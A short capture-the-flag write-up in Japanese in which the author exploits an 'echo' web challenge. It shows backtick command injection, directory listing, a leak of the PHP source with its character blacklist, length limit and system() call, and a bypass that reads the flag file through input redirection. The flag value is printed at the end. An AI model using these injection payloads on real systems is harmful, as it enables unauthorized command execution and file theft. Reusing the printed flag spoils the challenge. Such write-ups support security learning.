何かを書くとそれを即座にEchoしてくれる。 Echoコマンドだろうのでコマンドインジェクションかな?
$([command])を試してみると、
Hey mate, you seem to be using some characters that makes me wanna throw it back in your face >:(
怒られた。
使えない記号を確認するとほとんど使えないのだが、以下の記号は使えるようだった。
` < . /
`id`
を試すと、うまくいく。
ls ../をするとflag.txtというものがあるので、cat ../flag.txtとすると
Man that's a mouthful to echo, what even?
のように言われる。
ほう?
cat index.phpをすると、なぜかコードの一部が漏洩する
?~\\\\]/', $to_echo)) {
print "Hey mate, you seem to be using some characters that makes me wanna throw it back in your face >:(";
} elseif ($to_echo=="cat") {
print "Meowwww... Well you asked for a cat didn't you? That's the best impression you're gonna get :/";
} elseif (strlen($to_echo) > 15) {
print "Man that's a mouthful to echo, what even?";
} else {
system($cmd);
}
} else {
print "Alright, what would you have me say?";
}
?>
文字数制限か。確かにcat ../flag.txtだと17文字だ。
そういえば<が使えたな…
< ../flag.txtでフラグゲット。
flag{1beadaf44586ea4aba2ea9a00c5b6d91}
なぜ…
